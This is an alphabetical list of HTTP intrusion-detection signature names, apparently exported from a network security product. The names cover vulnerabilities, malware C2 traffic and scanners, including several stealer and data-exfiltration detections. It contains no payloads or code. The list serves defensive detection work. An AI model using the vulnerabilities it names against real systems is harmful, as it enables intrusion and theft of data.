HTTP_CSU-JOSSO-Login
HTTP_CSU-Junos-OS-Local-File-Inclusion-CVE-2022-22246
HTTP_CSU-Kaseya-VSA-Arbitrary-File-Upload
HTTP_CSU-Keenvalue
HTTP_CSU-Kelihos-Bot-Activity
HTTP_CSU-Kerio-Control-Crlf-Injection-CVE-2024-52875
HTTP_CSU-KeyBase-Keylogger-C2-Traffic
HTTP_CSU-Keysight-N6854a-And-N6841a-RF-Sensor-Directory-Traversal
HTTP_CSU-Koobface-Bot-Traffic
HTTP_CSU-Kubernetes-Authenticated-Code-Execution
HTTP_CSU-Kubernetes-Dashboard-Authentication-Bypass-Information-Disclosure
HTTP_CSU-Lansweeper-Tickettemplateactions.aspx-Directory-Traversal
HTTP_CSU-Laquis-Scada-Web-Server-Acompanhamentotela-Tagaltere-Command-Injection
HTTP_CSU-LG-LED-Assistant-Updatefile-Directory-Traversal
HTTP_CSU-LG-LED-Assistant-Upload-Directory-Traversal
HTTP_CSU-LibreNMS-addhost-Command-Injection
HTTP_CSU-LibreNMS-Collectd-Command-Injection
HTTP_CSU-Lighttpd-Connection-Rea-Hheader-More-Denial-Of-Service
HTTP_CSU-Lighttpd-Url-Path-2f-Decode-Denial-Of-Service
HTTP_CSU-Linear-eMerge-E3-Series-Access-Controller-Command-Injection
HTTP_CSU-Linksys-WRH54G-Router-HTTP-Request-Handling-Denial-of-Service
HTTP_CSU-LinuxKI-Toolset-Remote-Code-Execution
HTTP_CSU-LiteSpeed-Cache-Unauthenticated-Account-Takeover-CVE-2024-44000
HTTP_CSU-LiteSpeed-Web-Server-Source-Code-Disclosure
HTTP_CSU-Local-File-As-URI-Parameter
HTTP_CSU-LogPOS-Malware-Traffic-Detected
HTTP_CSU-Loki-RAT-Traffic
HTTP_CSU-Lotus-Notes-Cgi-Bin-BOF
HTTP_CSU-Lotus-Notes-Directory-Traversal
HTTP_CSU-Lucee-Administrator-imgProcess-Arbitrary-File-Write
HTTP_CSU-Lumma-Stealer-C2-Activity
HTTP_CSU-Lyris-Listmanager-Read-Attachment-SQL-Injection
HTTP_CSU-Macromedia-JRun-Isapi-Filter-Get-Request-Buffer-Overrun
HTTP_CSU-Macromedia-JRun-Server-File-Disclosure
HTTP_CSU-Magento-Forwarded-Parameter-Authentication-Bypass
HTTP_CSU-MagnusBilling-Application-Unauthenticated-Remote-Command-Execution
HTTP_CSU-Mahdi-Traffic
HTTP_CSU-Mailpost-Debug-Information-Disclosure
HTTP_CSU-MajorDoMo-Command-Injection
HTTP_CSU-Malat-Traffic
HTTP_CSU-Malicious-Bot-Activity
HTTP_CSU-Malicious-KiXtart-Script-Infection-Traffic
HTTP_CSU-Mambo-Globals-Php-MosConfig-Absolute-Path-Compromise
HTTP_CSU-Mambo-Globals-Php-MosConfig-Live-Site-Compromise
HTTP_CSU-man2web-Cgi-Command-Execution
HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Movesubgroup-Haid-Tohaid-SQL-Injection
HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Removemonitorfrmmg-Haid-SQL-Injection
HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Syncmonitors-Haid-SQL-Injection
HTTP_CSU-Manageengine-Desktopcentral-Agentlogupload-Arbitrary-File-Upload
HTTP_CSU-Manageengine-Desktopcentral-SQL-Injection
HTTP_CSU-Manageengine-DeviceExpert-User-Credentials-Disclosure
HTTP_CSU-Manageengine-EventLog-Analyzer-Hostdetails-Information-Disclosure
HTTP_CSU-Manageengine-Multiple-Products-Customername-SQL-Injection-Remote-Code-Execution
HTTP_CSU-Manageengine-Multiple-Products-Filecollector-Directory-Traversal
HTTP_CSU-Manageengine-Multiple-Products-Filecollector-Dopost-Directory-Traversal
HTTP_CSU-Manageengine-Multiple-Products-It360sputil-Resids-SQL-Injection
HTTP_CSU-Manageengine-NetFlow-Analyzer-And-IT360-DisplayChartPDF-Directory-Traversal
HTTP_CSU-Manageengine-Opmanager-Agentdetailsutil-Agentkey-SQL-Injection
HTTP_CSU-Manageengine-Servicedesk-Downloadfileservlet-Information-Disclosure
HTTP_CSU-McAfee-Asset-Manager-Reportsaudit.jsp-Input-Validation-Error
HTTP_CSU-McAfee-Cloud-Single-Sign-On-Extensionaccessservlet-Directory-Traversal
HTTP_CSU-MediaWiki-URI-Remote-Command-Execution
HTTP_CSU-Messaging-Gateway-Management-Console-Cross-Site-Scripting
HTTP_CSU-Metasploit-Handler-DoS
HTTP_CSU-Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution
HTTP_CSU-Microsoft-ASP.NET-Application-Folder-Information-Disclosure
HTTP_CSU-Microsoft-ASP.NET-Error-Handling-Denial-Of-Service
HTTP_CSU-Microsoft-ASP.NET-Forms-Authentication-Insecure-Redirect
HTTP_CSU-Microsoft-ASP.NET-Null-Byte-Termination-Vulnerability
HTTP_CSU-Microsoft-ASP.NET-PKCS-Padding-Information-Disclosure
HTTP_CSU-Microsoft-Chart-Control-Information-Disclosure-CVE-2011-1977
HTTP_CSU-Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975
HTTP_CSU-Microsoft-Exchange-PowerShell-Backend-EOP-CVE-2021-34523
HTTP_CSU-Microsoft-Exchange-SSRF-CVE-2022-41040
HTTP_CSU-Microsoft-Exchange-XSS-CVE-2015-1632
HTTP_CSU-Microsoft-FrontPage-Server-Extensions-MS-DOS-Device-Name-Denial-Of-Service
HTTP_CSU-Microsoft-IIS-5.0-WebDav-Request-Directory-Security-Bypass-URI
HTTP_CSU-Microsoft-IIS-Cachuri-Tree_Hash_Table-Denial-of-Service
HTTP_CSU-Microsoft-IIS-Cmdasp.asp-Access
HTTP_CSU-Microsoft-IIS-Directory-Authentication-Security-Bypass
HTTP_CSU-Microsoft-IIS-Malformed-Url
HTTP_CSU-Microsoft-IIS-Multiple-Extensions-Security-Bypass
HTTP_CSU-Microsoft-IIS-UNC-Path-Disclosure-Vulnerability
HTTP_CSU-Microsoft-IIS-UNC-Path-Source-Disclosure
HTTP_CSU-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-6
HTTP_CSU-Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability
HTTP_CSU-Microsoft-Internet-Connection-Wizard-Insecure-Loading-CVE-2010-3144
HTTP_CSU-Microsoft-Internet-Explorer-Compressed-Content-URL-Heap-Overflow
HTTP_CSU-Microsoft-Internet-Explorer-Long-Url-Buffer-Overflow
HTTP_CSU-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036
HTTP_CSU-Microsoft-Lync-Information-Disclosure-CVE-2014-1923
HTTP_CSU-Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability
HTTP_CSU-Microsoft-Office-Groove-Insecure-Library-Loading
HTTP_CSU-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029
HTTP_CSU-Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396
HTTP_CSU-Microsoft-Remote-Desktop-Web-Access-Cross-Site-Scripting
HTTP_CSU-Microsoft-Report-Viewer-XSS-Vulnerability-CVE-2011-1976
HTTP_CSU-Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357
HTTP_CSU-Microsoft-SharePoint-Directory-Traversal-Vulnerability
HTTP_CSU-Microsoft-SharePoint-Reflected-List-Parameter-CVE-2012-1863
HTTP_CSU-Microsoft-SharePoint-Remote-Code-Execution
HTTP_CSU-Microsoft-Sharepoint-Server-help.aspx-Denial-Of-Service
HTTP_CSU-Microsoft-SharePoint-XSS-CVE-2012-1859
HTTP_CSU-Microsoft-Sharepoint-XSS-Vulnerability
HTTP_CSU-Microsoft-SharePoint-XSS-Vulnerability-CVE-2013-0083
HTTP_CSU-Microsoft-VBA-Insecure-Library-Loading-CVE-2012-1854
HTTP_CSU-Microsoft-Visio-Insecure-Library-Loading-CVE-2010-3148
HTTP_CSU-Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147
HTTP_CSU-Microsoft-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145
HTTP_CSU-Microsoft-Windows-BranchCache-Insecure-Library-Loading-CVE-2010-3966
HTTP_CSU-Microsoft-Windows-Color-Control-Panel-Library-Loading-CVE-2010-5082
HTTP_CSU-Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032
HTTP_CSU-Microsoft-Windows-Insecure-Library-Loading
HTTP_CSU-Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519
HTTP_CSU-Microsoft-Windows-Media-Center-Insecure-Library-Loading
HTTP_CSU-Microsoft-Windows-Media-Encoder-Insecure-Library-Loading-CVE-2010-3965
HTTP_CSU-Microsoft-Windows-Movie-Maker-Insecure-Library-Loading-CVE-2010-3967
HTTP_CSU-Microsoft-Windows-MSHTML-File-Extension-Spoofing-Remote-Code-Execution
HTTP_CSU-Microsoft-Windows-TCP-IP-Stack-Url-Based-Qos-Denial-Of-Service
HTTP_CSU-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-34467
HTTP_CSU-Microweber-CMS-Local-File-Inclusion
HTTP_CSU-Miva-Htmlscript-Directory-Traversal
HTTP_CSU-MnoGoSearch-Search-Cgi-Tmplt-Parameter-BOF
HTTP_CSU-MnoGoSearch-Search-Cgi-Ul-Parameter-BOF
HTTP_CSU-Mocbot-Traffic
HTTP_CSU-MODx-Manager-Console-Access-Attempt
HTTP_CSU-Morcut-Malware-Traffic-Detected
HTTP_CSU-MosConfig-Code-Injection-Remote-Compromise
HTTP_CSU-Moxa-MXview-Path-Traversal-CVE-2021-38452
HTTP_CSU-MOXA-SoftCMS-Cgi-Program-SQL-Injection
HTTP_CSU-Mozilla-Firefox-XSL-Transformation-Memory-Corruption
HTTP_CSU-MPM-Guestbook-Pro-Header-Php-Code-Injection
HTTP_CSU-MS-Asp-Net-Path-Validation-Authentication-Bypass-MS05-004
HTTP_CSU-MS-Exchange-URL-Redirection-CVE-2014-6336
HTTP_CSU-MS-Forefront-UAG-Default-Reflected-XSS
HTTP_CSU-MS-Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080
HTTP_CSU-MS09-036
HTTP_CSU-MSIE-Information-Disclosure-Vulnerability-CVE-2013-3908
HTTP_CSU-Muieblackcat-Scanner-Usage
HTTP_CSU-Multiple-AV-Vendor-Invalid-Archive-Checksum-Bypass
HTTP_CSU-Multiple-Directory-Traversal-Vulnerabilities
HTTP_CSU-Multiple-DVR-Manufacturers-Configuration-Disclosure
HTTP_CSU-MyBB-Domecode-Function-Php-Code-Execution
HTTP_CSU-Myloader-Activity
HTTP_CSU-MySQL-MaxDB-WebDBM-BOF
HTTP_CSU-MySQL-MaxDB-WebDBM-BOF-2
HTTP_CSU-MySQL-MaxDB-WebDBM-BOF-3
HTTP_CSU-Nagios-Core-Cgi-Process_cgivars-Off-By-One
HTTP_CSU-Nagios-XI-Alert-Cloud-Cross-Site-Scripting
HTTP_CSU-Nagios-XI-favorites.inc.php-SQL-Injection
HTTP_CSU-Nagios-XI-Magpie-Curl-Argument-Injection
HTTP_CSU-Nagios-XI-Stored-Cross-Site-Scripting-CVE-2018-15712
HTTP_CSU-Nagios-XI-Web-SSH-Terminal-Sshterm-Cross-Site-Scripting
HTTP_CSU-NaviCOPA-Web-Server-Buffer-Overflow
HTTP_CSU-Navigate-CMS-Unauthenticated-Remote-Code-Execution
HTTP_CSU-Nessus-Vulnerability-Scanner-Usage
HTTP_CSU-NetBiter-webSCADA-Local-File-Disclosure
HTTP_CSU-NetBiter-webSCADA-User-Information-Disclosure
HTTP_CSU-Netgain-Systems-Enterprise-Manager-Misc.sample_Jsp-Type-Directory-Traversal
HTTP_CSU-Netgain-Systems-Enterprise-Manager-Snmpwalk-IP-Directory-Traversal
HTTP_CSU-NetGear-Administrator-Password-Disclosure
HTTP_CSU-NetGear-ProSafe-NMS300-Myhandlerinterceptor-Authentication-Bypass
HTTP_CSU-NetGear-R7000-And-R6400-Command-Injection-Enable-Telnet
HTTP_CSU-NetGear-ReadyNAS-Perl-Code-Injection
HTTP_CSU-NetGear-SSL312-Cgi-DoS
HTTP_CSU-NetGear-WNAP210-And-WNDAP350-Remote-Password-Disclosure
HTTP_CSU-NetGear-WNDAP350-Remote-Password-Disclosure
HTTP_CSU-NetMechanica-NetDecision-HTTP-Server-Stack-Based-Buffer-Overflow
HTTP_CSU-NetObserve-Authentication-Bypass
HTTP_CSU-Netscape-Es-Wp-Access
HTTP_CSU-Netwin-SurgeMail-Webmail-Format-String
HTTP_CSU-Nginx-Request-URI-Verification-Security-Bypass
HTTP_CSU-Nginx-URI-Parsing-Buffer-Underflow
HTTP_CSU-Nikto-Ipconfig.exe-Scan-Detect
HTTP_CSU-Nikto-Scan-Detect
HTTP_CSU-NMAP-Web-Scanning-Activity
HTTP_CSU-Node.js-Systeminformation-Library-Command-Injection-CVE-2021-21315
HTTP_CSU-NorthStar-C2-XSS-To-Agent-RCE
HTTP_CSU-Nostromo-Directory-Traversal
HTTP_CSU-Novell-eDirectory-dhost-Buffer-Overflow
HTTP_CSU-Novell-eDirectory-Server-iMonitor-Buffer-Overflow
HTTP_CSU-Novell-Groupwise-HTTP-Interfaces-Arbitrary-File-Retrieval
HTTP_CSU-Novell-Groupwise-Internet-Agent-HTTP-Interface-Stack-Buffer-Overflow
HTTP_CSU-Novell-ZENworks-Asset-Management-File-Upload-Directory-Traversal
HTTP_CSU-Novell-ZENworks-Configuration-Management-Umaninv-Information-Disclosure
HTTP_CSU-Novell-ZENworks-Patch-Management-Multiple-SQL-Injection-Vulnerabilities
HTTP_CSU-NPDS-Thold-SQL-Injection
HTTP_CSU-Ntopng-Authentication-Bypass-CVE-2021-28073
HTTP_CSU-Nucrypt-Activity
HTTP_CSU-NuggetPhantom-Infection-Traffic
HTTP_CSU-Oldrea-Havex-CnC-Request
HTTP_CSU-Oneworldstore-Owofflinecc-Information-Disclosure
HTTP_CSU-Onlinegames
HTTP_CSU-OP5-Monitor-Command-Test-Command-Injection
HTTP_CSU-Openemr-C_document.class.php-View_Action-Doc_Id-Cross-Site-Scripting
HTTP_CSU-Openemr-Facility_admin.php-Cross-Site-Scripting
HTTP_CSU-Openemr-Make_Task-SQL_Injection
HTTP_CSU-OpenFire-Path-Traversal-Via-Setup-Environment-CVE-2023-32315
HTTP_CSU-Openmetadata-Spel-Injection-CVE-2024-28254
HTTP_CSU-Optergy-Proton-And-Enterprise-BMS-Command-Injection-Using-A-Backdoor
HTTP_CSU-Oracle-Application-Server-9i-WebCache-File-Corruption
HTTP_CSU-Oracle-Application-Server-Forms-Arbitrary-System-Command-Execution
HTTP_CSU-Oracle-Application-Server-Portal-Cross-Site-Scripting
HTTP_CSU-Oracle-Application-Server-Reports-Arbitrary-System-Command-Execution
HTTP_CSU-Oracle-Application-Server-XSS
HTTP_CSU-Oracle-Application-Testing-Suite-Reportname-Directory-Traversal
HTTP_CSU-Oracle-Bea-WebLogic-Server-Console-help.portal-XSS
HTTP_CSU-Oracle-Bea-WebLogic-URL-String-BOF
HTTP_CSU-Oracle-BeeHive-Voice-Servlet
HTTP_CSU-Oracle-BPEL-Process-Manager-Scriptservlet-Information-Disclosure
HTTP_CSU-Oracle-Business-Intelligence-Enterprise-Edition-Cross-Site-Scripting
HTTP_CSU-Oracle-Business-Intelligence-Mobile-App-Designer-Information-Disclosure
HTTP_CSU-Oracle-Demantra-Demand-Management-Information-Leak
HTTP_CSU-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2856-Cross-Site-Scripting
HTTP_CSU-Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2189-Infinite-Loop
HTTP_CSU-Oracle-Fusion-Middleware-Information-Disclosure
HTTP_CSU-Oracle-GlassFish-Server-Themeservlet-Directory-Traversal
HTTP_CSU-Oracle-HTTP-Server-Mod-Access-Restriction-Bypass
HTTP_CSU-Oracle-HTTP-Server-Mod-Access-Restriction-Bypass-2
HTTP_CSU-Oracle-Iplanet-Web-Server-Information-Disclosure-Attack
HTTP_CSU-Oracle-Java-Runtime-Environment-Insecure-File-Loading
HTTP_CSU-Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization
HTTP_CSU-Oracle-Opera-Remote-Code-Execution-CVE-2023-21932
HTTP_CSU-Oracle-Oss-Support-Tools-Diagnostic-Assistant-External-Entity-Injection
HTTP_CSU-Oracle-Potential-Vulnerability-Probe-Request
HTTP_CSU-Oracle-Reports-Service-File-Overwrite
HTTP_CSU-Oracle-Secure-Backup-Administration-Preauth-Variable-Command-Injection
HTTP_CSU-Oracle-Secure-Backup-Administration-Validate_Login-Command-Injection
HTTP_CSU-Oracle-Secure-Backup-Objectname-Variable-Command-Injection
HTTP_CSU-Oracle-Secure-Enterprise-Search-Parameter-Cross-Site-Scripting
HTTP_CSU-Oracle-TimesTen-Format-Strings-Vulnerability-2
HTTP_CSU-Oracle-TimesTen-In-Memory-Database-HTTP-Request-Denial-Of-Service
HTTP_CSU-Oracle-WebLogic-Remote-Diagnosis-Assistant-Rda_tfa_Ref_Date-Command-Injection
HTTP_CSU-Oracle-WebLogic-Server-Local-File-Inclusion-CVE-2022-21371
HTTP_CSU-Oracle-XSQLConfig.xml-Information-Disclosure
HTTP_CSU-Oracle9i-Source-Code-Disclosure
HTTP_CSU-osCommerce-Response-Splitting
HTTP_CSU-Owncloud-Information-Disclosure-CVE-2023-49103
HTTP_CSU-Palo-Alto-Expedition-Missing-Authentication-CVE-2024-5910
HTTP_CSU-Palo-Alto-PAN-OS-Authentication-Bypass-CVE-2025-0108
HTTP_CSU-Papercut-Fileuploadauthenticationfilter-Authentication-Bypass
HTTP_CSU-Papercut-NG-And-MF-Messagecontroller-Reflected-Cross-Site-Scripting
HTTP_CSU-Papercut-WebDAV-Path-Traversal-CVE-2023-39143
HTTP_CSU-Parse-Server-literalizeRegexPart-SQL-Injection
HTTP_CSU-Path-Traversal-Sequence-In-File-Name
HTTP_CSU-PDGSoft-Shopping-Cart-Orders-Exposure
HTTP_CSU-PeerCast-Request-Format-String
HTTP_CSU-PeerCast-Stream-BOF
HTTP_CSU-Pentaho-Business-Server-Auth-Bypass-And-Server-Side-Template-Injection-RCE
HTTP_CSU-Php-Cgi-Query-String-Information-Disclosure
HTTP_CSU-Php-Cgi-Remote-Code-Execution-CVE-2024-4577
HTTP_CSU-Php-Chart-Wizards-Url-Remote-Code-Execution
HTTP_CSU-Php-Error-Loggin-Format-Strigs-Vuln-Strengur
HTTP_CSU-PHP-FPM-Init_request_info-Path_Info-Buffer-Underflow
HTTP_CSU-Php-Function-Header-Injection
HTTP_CSU-Php-Fusion-Database-Backup-Disclosure
HTTP_CSU-Php-Injection-Attack
HTTP_CSU-Php-Nuke-Admin-Styles-Phpbb-Root-Path-System-Compromise
HTTP_CSU-Php-Nuke-SQL-Injection
HTTP_CSU-Php-Phpinfo-request
HTTP_CSU-Php-Phpinfo-XSS-Get
HTTP_CSU-Php-Poison-Null-Byte-Strip-Tags-Bypass
HTTP_CSU-PHP-Remote-File-Inclusion
HTTP_CSU-Php-Scripting-In-Client-Request
HTTP_CSU-Php-Suspicious-Absolute-Path-Parameter
HTTP_CSU-Php-Suspicious-Basedir-Parameter
HTTP_CSU-Php-Suspicious-Document-Root-Parameter
HTTP_CSU-Php-Suspicious-External-Parameter-Reference
HTTP_CSU-Php-Suspicious-Go-Parameter
HTTP_CSU-Php-Suspicious-Include-Parameter
HTTP_CSU-Php-Suspicious-Path-Parameter
HTTP_CSU-Php-Suspicious-Root-Parameter
HTTP_CSU-Php-Suspicious-Site-Parameter
HTTP_CSU-Php.cgi-Access
HTTP_CSU-Php.cgi-Possible-File-Disclosure
HTTP_CSU-Phpbb-Sessions-Php-Autologinid-Authentication-Bypass
HTTP_CSU-Phpgacl-Acl_Admin-Reflected-Cross-Site-Scripting
HTTP_CSU-Phpmyadmin-Code-Injection-Remote-Compromise
HTTP_CSU-Phpmyadmin-Console-Access-Attempt
HTTP_CSU-Phpmyadmin-Export-Php-Directory-Traversal
HTTP_CSU-PHPUnit-Remote-Code-Execution-CVE-2017-9841
HTTP_CSU-Pimcore-Rest-API-SQL-Injection
HTTP_CSU-Pineapp-Mail-Secure-Ldapsyncnow-Remote-Command-Execution
HTTP_CSU-Pinkslip-Bot-Traffic
HTTP_CSU-Plex-Media-Server-Plugin-Unpickle-Dict-Windows-RCE
HTTP_CSU-Poison-Response-Splitting-Query
HTTP_CSU-Ponmocup-Activity
HTTP_CSU-Popper-Webmail-Remote-Code-Execution
HTTP_CSU-Portalscan
HTTP_CSU-Possible-IIS-Upload-File-Exploit
HTTP_CSU-Possible-Scan-For-Wordpress-RevSlider-Vulnerability
HTTP_CSU-Possible-Shamoon-DistTrack-Data-Upload
HTTP_CSU-Possible-ShellCode-In-URI
HTTP_CSU-Possible-Vice-Society-PowerShell-Data-Exfiltration-Traffic
HTTP_CSU-Potential-Dot-Dot-Slash-Directory-Traversal
HTTP_CSU-Potential-MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432
HTTP_CSU-Potential-System-File-Disclosure
HTTP_CSU-Predator-The-Thief-C2-Traffic
HTTP_CSU-Procurve-Manager-Snac-Getdomaincontrollerservlet-Policy-Bypass
HTTP_CSU-Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection
HTTP_CSU-Progress-Telerik-Report-Server-Authentication-Bypass-CVE-2024-4358
HTTP_CSU-Progress-WhatsUp-Gold-Testcontroller-Information-Disclosure-Vulnerabilities
HTTP_CSU-PROMOTIC-Directory-Traversal
HTTP_CSU-PRTG-Network-Monitor-Local-File-Inclusion-CVE-2018-19410
HTTP_CSU-Pulse-Connect-Secure-Remote-Code-Execution-CVE-2021-22893
HTTP_CSU-Pulse-Secure-SSL-VPN-Cross-Site-Scripting
HTTP_CSU-Pulse-Secure-SSL-VPN-Pre-Auth-Arbitrary-File-Reading
HTTP_CSU-Pulse-Secure-VPN-Arbitrary-Command-Execution
HTTP_CSU-Pushdo-Spambot
HTTP_CSU-Py-Software-Active-Webcam-Webserver-Floppy-DoS
HTTP_CSU-PyTorch-Model-Server-Registration-And-Deserialization-RCE
HTTP_CSU-Qlik-Sense-Path-Traversal-CVE-2023-41266
HTTP_CSU-Quest-Kace-Systems-Management-Command-Injection
HTTP_CSU-Raptor-Train-Malware-Activity
HTTP_CSU-Ray-OS-Command-Injection-Via-Format-Parameter-CVE-2023-6019
HTTP_CSU-RDStealer-Malware-C2-Traffic
HTTP_CSU-Red-Hat-Jboss-Seam-Interfacegenerator-Information-Disclosure
HTTP_CSU-Redhat-Apache-Cachemgr-Cgi
HTTP_CSU-Redhat-Jboss-Enterprise-Application-Platform-Jmx-Console-Auth-Bypass
HTTP_CSU-Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
HTTP_CSU-Rejetto-HTTP-File-Server-Possible-Command-Injection-CVE-2024-39943
HTTP_CSU-Rejetto-HttpFileServer-Remote-Command-Execution
HTTP_CSU-Remote-Code-Execution-Via-Cgi-Batch-Arguments
HTTP_CSU-Response-Splitting
HTTP_CSU-ReverseRAT-Infection-Traffic
HTTP_CSU-RichFaces-Framework-DATA-URL-Segment-With-Compressed-Content
HTTP_CSU-RichFaces-Framework-Expression-Language-Injection-Known-Payload
HTTP_CSU-RIG-EK-Traffic-Pattern
HTTP_CSU-Roads-File-Disclosure
HTTP_CSU-Robots.txt-File-Access
HTTP_CSU-Rockwell-Automation-Factorytalk-SE-RCE
HTTP_CSU-Roundcube-Webmail-SQL-Injection-CVE-2021-44026
HTTP_CSU-RSA-Authentication-Web-Agent-Request
HTTP_CSU-Ruckus-Wireless-Admin-Remote-Code-Execution-CVE-2023-25717
HTTP_CSU-Saefko-RAT-C2-Traffic
HTTP_CSU-Sagem-Fast-3304-V1-Denial-Of-Service
HTTP_CSU-Sambar-Search-DLL-Directory-Listing-Disclosure
HTTP_CSU-Sample-Cgi-Jj-Access
HTTP_CSU-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability
HTTP_CSU-SAP-Messenger-Web-Server-Buffer-Overflow-Vulnerability
HTTP_CSU-SAP-Netweaver-Application-Server-Directory-Traversal-CVE-2017-12637
HTTP_CSU-SAP-Netweaver-File-Upload-Vulnerability-CVE-2021-38163
HTTP_CSU-SAP-Netweaver-Invoker-Servlet-Remote-Code-Execution
HTTP_CSU-SAP-Netweaver-Suspicious-Probe-Request
HTTP_CSU-SAP-Netweaver-Visual-Composer-CVE-2025-31324-WebShell-Activity
HTTP_CSU-Schneider-Electric-Iiot-Monitor-Downloadcsv-Directory-Traversal
HTTP_CSU-Schneider-Electric-SCADA-Expert-ClearSCADA-Denial-Of-Service
HTTP_CSU-Script-Tag-In-URI
HTTP_CSU-Serendipity-Exit-Php-SQL-Injection
HTTP_CSU-Server-Side-Request-Forgery-In-Oracle-WebLogic-Server-CVE-2014-4210
HTTP_CSU-Server-Side-Scripting-Suspicious-External-Parameter-Reference
HTTP_CSU-Server-Side-Scripting-Suspicious-External-Text-File-Reference
HTTP_CSU-ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879
HTTP_CSU-Shared-Variables
HTTP_CSU-Shlayer-Trojan-Infection-Traffic
HTTP_CSU-SideWinder-APT-C2-Traffic
HTTP_CSU-Siemens-Gigaset-se551-Authorization-Bypass
HTTP_CSU-Siemens-Gigaset-se551-Restart-Attempt
HTTP_CSU-Siemens-WinCC-MiniWeb-Denial-Of-Service
HTTP_CSU-SimpleHelp-Unauthenticated-Path-Traversal-CVE-2024-57727
HTTP_CSU-Sitecore-XP-Insecure-Deserialization
HTTP_CSU-SixApart-Movable-Type-Code-Execution
HTTP_CSU-Skywiper-B-Trojan-Activity-Detected
HTTP_CSU-Smart-Software-Solutions-Codesys-ENI-Server-Stack-Buffer-Overflow
HTTP_CSU-Smart-Software-Solutions-Codesys-Webserver-Stack-Buffer-Overflow
HTTP_CSU-Snap-Creek-Duplicator-Wordpress-Plugin-Code-Injection
HTTP_CSU-SocGholish-Framework-HTTP-Request
HTTP_CSU-Solarwinds-Firewall-Security-Manager-Userlogin.jsp-Policy-Bypass
HTTP_CSU-Solarwinds-Orion-Patch-Manager-Chart-Insecure-Deserialization
HTTP_CSU-Solarwinds-Orion-Platform-Authentication-Bypass
HTTP_CSU-Solarwinds-Serv-U-Directory-Traversal-CVE-2024-28995
HTTP_CSU-Solarwinds-Storage-Manager-Authenticationfilter-Authentication-Bypass
HTTP_CSU-Sonatype-Nexus-Repository-Manager-CVE-2021-37152-Cross-Site-Scripting
HTTP_CSU-SonicWall-Email-Security-Path-Traversal-CVE-2021-20023
HTTP_CSU-SonicWall-Gms-And-Analytics-Detectinjection-Potential-SQL-Injection
HTTP_CSU-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
HTTP_CSU-SonicWall-Gms-And-Analytics-Searchfilter-Command-Injection
HTTP_CSU-SonicWall-Remote-Code-Execution-CVE-2021-20038
HTTP_CSU-SonicWall-Secure-Mobile-Access-Arbitrary-File-Deletion
HTTP_CSU-SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704
HTTP_CSU-SPIP-RSS-Php-Globals-Type-URLs-Code-Injection
HTTP_CSU-Splunk-Collect-File-Directory-Traversal
HTTP_CSU-Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal
HTTP_CSU-Spring-Cloud-Config-Server-Directory-Traversal
HTTP_CSU-Spring-Security-RegexRequestMatcher-Authorization-Bypass-CVE-2022-22978
HTTP_CSU-Spyeye-Traffic
HTTP_CSU-Spyware-Webhancer
HTTP_CSU-SQL-Declare-Cast
HTTP_CSU-SQL-Expression-Always-True
HTTP_CSU-SQL-Injection-End-Of-Line-Comments
HTTP_CSU-SQL-Select-Password
HTTP_CSU-SQL-Syntax-In-URI-Parameters
HTTP_CSU-SQL-Union-Select
HTTP_CSU-SQuery-Php-Remote-File-Inclusion
HTTP_CSU-Srizbi-Activity
HTTP_CSU-Srng
HTTP_CSU-Starware-Toolbar-Update
HTTP_CSU-Subgraph-Vega-Vulnerability-Scanner-Usage
HTTP_CSU-SugarCRM-Multiple-Parameters-Directory-Traversal
HTTP_CSU-SugarCRM-Record-Parameter-SQL-Injection
HTTP_CSU-Sun-One-Iplanet-Search-Component-File-Disclosure
HTTP_CSU-Sundown-Malware-Activity
HTTP_CSU-SuperGuestBook-Configuration-File-Access
HTTP_CSU-Supra-Smart-Cloud-TV-Remote-File-Inclusion
HTTP_CSU-SUSE-Apache-Cgi-Source-Disclosure
HTTP_CSU-Suspected-APT-Traffic-Pattern
HTTP_CSU-Suspected-Dot-Dot-Slash-Directory-Traversal
HTTP_CSU-Suspected-System-File-Disclosure
HTTP_CSU-Suspicious-Dynamic-Link-Library-Download-Request
HTTP_CSU-Suspicious-OGNL-Expression
HTTP_CSU-Suspicious-OGNL-Expression-2
HTTP_CSU-Suspicious-Request
HTTP_CSU-Suspicious-URI-Pattern
HTTP_CSU-Suspicious-Windows-Script-File-Retrieval-Via-WebDav
HTTP_CSU-Suspiciously-Long-URI-Component
HTTP_CSU-Suspiciously-Long-URI-Component-With-Potential-Shellcode
HTTP_CSU-Suspiciously-Long-URI-Path-Component
HTTP_CSU-Sybase-EAServer-WebConsole-Buffer-Overflow
HTTP_CSU-Symantec-Endpoint-Protection-Manager-Authentication-Bypass
HTTP_CSU-Symantec-IM-Manager-Multiple-Cross-Site-Scripting
HTTP_CSU-Symantec-IM-Manager-Web-Interface-Processaction-Code-Execution
HTTP_CSU-Symantec-Web-Gateway-Blacklist.PHP-Cross-Site-Scripting
HTTP_CSU-Symantec-Web-Gateway-Blocked.php-Blind-SQL-Injection
